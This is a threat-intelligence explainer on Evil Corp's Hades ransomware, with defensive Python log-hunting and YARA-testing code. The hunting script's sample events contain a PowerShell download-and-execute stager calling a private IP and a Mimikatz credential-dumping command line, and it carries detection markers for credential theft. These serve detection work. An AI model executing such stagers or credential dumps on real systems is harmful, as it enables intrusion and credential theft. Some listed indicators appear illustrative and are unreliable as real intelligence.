# **Hades Malware – Ransomware by Evil Corp** 💀💻

**Hades ransomware** is a **highly targeted ransomware strain** attributed to **Evil Corp** (also tracked as **Indrik Spider** and **Gold Drake**). It emerged in **late 2020** as a **rebranded derivative of WastedLocker**, most likely to evade the **U.S. Treasury sanctions** imposed on Evil Corp in December 2019. Unlike mass-distributed ransomware, **Hades focuses on large corporations** for **multi-million-dollar ransom demands** and relies on **double extortion** (data is stolen before it is encrypted).

---

## **🔹 Key Facts About Hades**

- **First Seen:** December 2020
- **Threat Actor:** **Evil Corp** (Indrik Spider / Gold Drake)
- **Primary Targets:** Large enterprises in **manufacturing, logistics, healthcare, retail**
- **Attack Method:** Phishing, credential theft, and custom payloads
- **Ransom Demand:** Typically in the **millions** of dollars
- **Notable Victims:** **Forward Air (2020), European corporations (2021)**

🚨 **Hades ransomware is NOT the same as the "Hades" APT** (a separate cyber-espionage actor tracked under the same name) – different actors!

---

## **🔹 Notable Hades Ransomware Attacks**

|**Attack**|**Description**|**Target**|**Year**|
|---|---|---|---|
|**Forward Air Attack**|Logistics firm suffered operational disruption & an extortion attempt|U.S. logistics|2020|
|**Undisclosed Manufacturing Companies**|Multiple European firms targeted for multimillion-dollar ransoms|Manufacturing sector|2021|
|**Healthcare Sector Attacks**|Hospitals and healthcare firms hit with double extortion|U.S. & EU healthcare|2021|

📌 **Why These Targets?** – Evil Corp focuses on high-revenue industries that **can't afford downtime**, which increases the likelihood that the ransom is paid.
---

## **🔹 Hades Malware Analysis & Tactics**

### **1️⃣ Initial Access (How It Spreads)**

- **Spear-phishing emails** with **malicious attachments**
- **Compromised RDP servers** (brute-force & credential stuffing)
- **Fake software installers**
- **Exploiting vulnerabilities in VPNs and remote-access tools**

### **2️⃣ Execution & Lateral Movement**

- Uses **PowerShell scripts & Cobalt Strike** for execution and command-and-control
- Deploys **Mimikatz** to steal credentials from LSASS memory
- **Disables security tools (AV, EDR)** before staging the payload
- Moves laterally through **SMB, PsExec, and RDP abuse** with the stolen credentials

### **3️⃣ Data Theft & Ransomware Deployment**

- **Exfiltrates sensitive data** before encryption (double extortion)
- Encrypts local & network files using **AES-256 & RSA-2048** (the usual hybrid scheme: files are encrypted with AES, and the AES keys are protected with an attacker-held RSA key pair)
- Drops a **ransom note** instructing victims to contact the attackers via a **Tor-based chat**

### **4️⃣ Impact & Extortion**

- Encrypted systems cannot be recovered without the attacker's RSA private key or clean offline backups
- Threatens to **leak stolen data** on dark-web leak sites
- Demands **millions in Bitcoin** for the decryptor

---

## **🔹 Hades vs Other Evil Corp Ransomware**

|**Feature**|**WastedLocker**|**Hades**|**LockBit 3.0 (Affiliate Use)**|
|---|---|---|---|
|**Actor**|Evil Corp|Evil Corp|Mixed groups (possibly Evil Corp as an affiliate)|
|**Targeting**|U.S. corporations|U.S. & EU companies|Global|
|**Ransom Method**|High-value targets|High-value targets|Mass Ransomware-as-a-Service (RaaS)|
|**Sanctions Evasion?**|❌ No|✅ Yes|✅ Yes|

🚨 **Why the rebrand?** – After the **December 2019 U.S. Treasury (OFAC) sanctions** on Evil Corp, U.S. persons were **prohibited from transacting with the group**, so a victim paying a ransom to a known Evil Corp brand risks a sanctions violation. Hades was likely a way to **obscure attribution and bypass these restrictions**.
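The lateral-movement tradecraft above (PsExec service installs, RDP abuse, encoded PowerShell, Mimikatz) is exactly what the "monitor for abnormal SMB, RDP and PsExec usage" item in the defence checklist further down has to catch. The following is an added example of that hunt logic in Python; it is not Evil Corp tooling and not any vendor's detection content. The event records are constructed to mirror the fields of Windows events 7045, 4624 and 4688, and the hostnames, users, IP addresses and the `JUMP_HOSTS` allowlist are assumptions.

```python
"""Hunt for the lateral-movement tradecraft described above (PsExec, RDP abuse,
encoded PowerShell, Mimikatz) in Windows event records.

Added example: not Evil Corp tooling and not any vendor's detection content.
Events are constructed inline as dicts mirroring the fields of real Windows
Security/System events (IDs 7045, 4624, 4688); hostnames, users, IPs and
paths are made up."""
import base64
import re
from collections import defaultdict

# Assumption: approved RDP sources (jump hosts); anything else is worth a look.
JUMP_HOSTS = {"10.0.0.5"}

# Mimikatz module syntax survives renaming of the binary and shows up in
# command lines (4688) and in decoded PowerShell (Invoke-Mimikatz).
MIMIKATZ_MARKERS = ("sekurlsa::", "lsadump::", "privilege::debug", "invoke-mimikatz")

# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def mimikatz_markers(text):
    """List the Mimikatz module names present in text (case-insensitive)."""
    lowered = text.lower()
    return [mk for mk in MIMIKATZ_MARKERS if mk in lowered]


def hunt(events):
    """Return (host, technique, detail) findings for the given events."""
    findings = []
    for ev in events:
        host = ev.get("Computer", "?")
        eid = ev.get("EventID")
        if eid == 7045:
            # PsExec installs PSEXESVC on the target; a renamed copy usually
            # still carries the file name in ImagePath.
            name = ev.get("ServiceName", "")
            path = ev.get("ImagePath", "")
            if name.upper() == "PSEXESVC" or "psexesvc" in path.lower():
                findings.append((host, "psexec_service_install", name))
        elif eid == 4624 and ev.get("LogonType") == 10:
            # Logon type 10 = RemoteInteractive (RDP).
            src = ev.get("IpAddress", "")
            if src not in JUMP_HOSTS:
                findings.append((host, "rdp_logon_from_unapproved_source",
                                 f"{ev.get('TargetUserName')}@{src}"))
        elif eid == 4688:
            cmd = ev.get("CommandLine", "")
            decoded = decode_encoded_powershell(cmd)
            if decoded is not None:
                findings.append((host, "encoded_powershell", decoded))
            markers = mimikatz_markers(cmd) + mimikatz_markers(decoded or "")
            if markers:
                findings.append((host, "mimikatz_module_syntax", ",".join(markers)))
    return findings


def techniques_per_host(findings):
    """Group findings by host: several techniques on one host is the chain
    (PsExec in, then credential theft) worth escalating first."""
    per_host = defaultdict(set)
    for host, technique, _ in findings:
        per_host[host].add(technique)
    return dict(per_host)


# Constructed sample events ---------------------------------------------------
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.9/a')"
_ENC = base64.b64encode(_STAGER.encode("utf-16-le")).decode()

EVENTS = [
    {"EventID": 7045, "Computer": "FS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 10,
     "TargetUserName": "svc_backup", "IpAddress": "10.20.30.41"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 10,
     "TargetUserName": "adm_ops", "IpAddress": "10.0.0.5"},   # jump host: no alert
    {"EventID": 4688, "Computer": "WS07",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"EventID": 4688, "Computer": "WS07", "NewProcessName": r"C:\Users\Public\m.exe",
     "CommandLine": '"m.exe" "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"EventID": 4688, "Computer": "WS07",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
    print(techniques_per_host(hunt(EVENTS)))
```

Two design points: the Mimikatz check keys on module syntax (`sekurlsa::`, `privilege::debug`) rather than the file name, so the renamed `m.exe` is still caught, and the encoded PowerShell is decoded before it is inspected, since the stager string never appears in clear text in the raw command line.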
---

## **🔹 Indicators of Compromise (IOCs)**

### **File Hashes (SHA-256)**

[Samples vary – real IOCs should be gathered from threat intelligence feeds]

### **Network Indicators**

- **C2 Domains:** `hadesransom[.]top`, `decryptyourdata[.]com`
- **Tor communication links** (the ransom note directs victims to a Tor-based chat)

### **YARA Rule Example for Hades Ransomware**

```yara
rule Hades_Ransomware
{
    meta:
        description = "Detects Hades ransomware samples"
        author = "Threat Research"
        date = "2021-01-15"

    strings:
        // wide ascii: match both the one-byte and the UTF-16LE form
        $a = "Hades Ransomware" wide ascii
        $b = "AES-256 encryption" wide ascii
        $c = "decryptyourdata" ascii

    condition:
        // "any of them" fires on a single hit, so $b alone will match benign
        // documents that merely mention AES-256; tighten to "2 of them" or
        // add a PE check before deploying this at scale
        any of them
}
```

---

## **🔹 How to Defend Against Hades**

- ✅ Block Office macros from untrusted sources and **constrain PowerShell** (Constrained Language Mode, script-block logging) rather than relying on a blanket ban that admins will work around
- ✅ Enforce **MFA on RDP & VPN** access and keep RDP off the internet
- ✅ Monitor for abnormal **SMB, RDP, and PsExec** usage (PSEXESVC service installs, RDP logons from anything but the jump hosts)
- ✅ Use **EDR** to detect **Cobalt Strike & Mimikatz** activity, in particular LSASS memory access
- ✅ Regularly **back up data**, keep backups **offline**, and test that they restore

---

## **🔹 Current Status: Is Hades Still Active?**

🔄 **Yes, but under new branding!** Since late 2021, Hades has faded from the spotlight, and Evil Corp is suspected of using **LockBit** and **Black Basta** ransomware to keep its distance from the sanctioned Evil Corp identity.
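To see what the YARA rule's `wide ascii` modifiers and `any of them` condition actually match, the following added example re-implements that subset of YARA matching in Python and runs it over two constructed buffers. It is not YARA and not detection content from any vendor; the sample buffers and the `MALICIOUS_SAMPLE` / `BENIGN_SAMPLE` names are made up for illustration.

```python
"""Evaluate the YARA rule above without YARA, to see exactly what `wide ascii`
and `any of them` mean and how far the rule reaches.

Added example: not YARA itself and not any vendor's detection content. It
implements only the subset the rule uses (text strings with the `ascii` and
`wide` modifiers, `N of them` conditions). The sample buffers are constructed;
no real Hades sample is embedded."""

# The rule's strings, transcribed: identifier -> (text, modifiers)
RULE_STRINGS = {
    "$a": ("Hades Ransomware", ("wide", "ascii")),
    "$b": ("AES-256 encryption", ("wide", "ascii")),
    "$c": ("decryptyourdata", ("ascii",)),
}


def byte_patterns(text, modifiers):
    """Yield (modifier, bytes) pairs YARA would search for.

    `ascii` is the one-byte-per-character form; `wide` is UTF-16LE, the form
    Windows binaries use for their string literals, which an ascii-only
    string would never hit."""
    if "ascii" in modifiers:
        yield "ascii", text.encode("ascii")
    if "wide" in modifiers:
        yield "wide", text.encode("utf-16-le")


def scan(data, rule_strings=RULE_STRINGS):
    """Return {identifier: [(offset, modifier), ...]} for every hit in data."""
    hits = {}
    for ident, (text, mods) in rule_strings.items():
        for mod, pattern in byte_patterns(text, mods):
            start = 0
            while (pos := data.find(pattern, start)) != -1:
                hits.setdefault(ident, []).append((pos, mod))
                start = pos + 1
    return hits


def matches_n_of_them(data, n, rule_strings=RULE_STRINGS):
    """The rule's condition: `any of them` is n == 1, `all of them` is
    n == len(rule_strings)."""
    return len(scan(data, rule_strings)) >= n


# Constructed samples ---------------------------------------------------------
# A fake binary: 16 bytes of header padding, the product name stored wide
# (as a Windows binary would), then an ascii ransom-note fragment.
MALICIOUS_SAMPLE = (
    b"MZ" + b"\x00" * 14
    + "Hades Ransomware".encode("utf-16-le")
    + b"\x00\x00contact us at decryptyourdata via Tor\x00"
)

# A benign document that merely mentions the cipher.
BENIGN_SAMPLE = b"This whitepaper explains AES-256 encryption for backups."

if __name__ == "__main__":
    print(scan(MALICIOUS_SAMPLE))   # $a as wide at offset 16, $c as ascii at 64
    print(scan(BENIGN_SAMPLE))      # only $b, yet `any of them` still fires
    for name, buf in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, "any of them:", matches_n_of_them(buf, 1),
              "2 of them:", matches_n_of_them(buf, 2))
```

The benign whitepaper text trips `any of them` on `$b` alone, which is why the rule should be tightened to `2 of them` (or paired with a PE-header check) before it goes into a production scanner; the fake binary still matches under the stricter condition because `$a` is found in its wide form and `$c` in ascii.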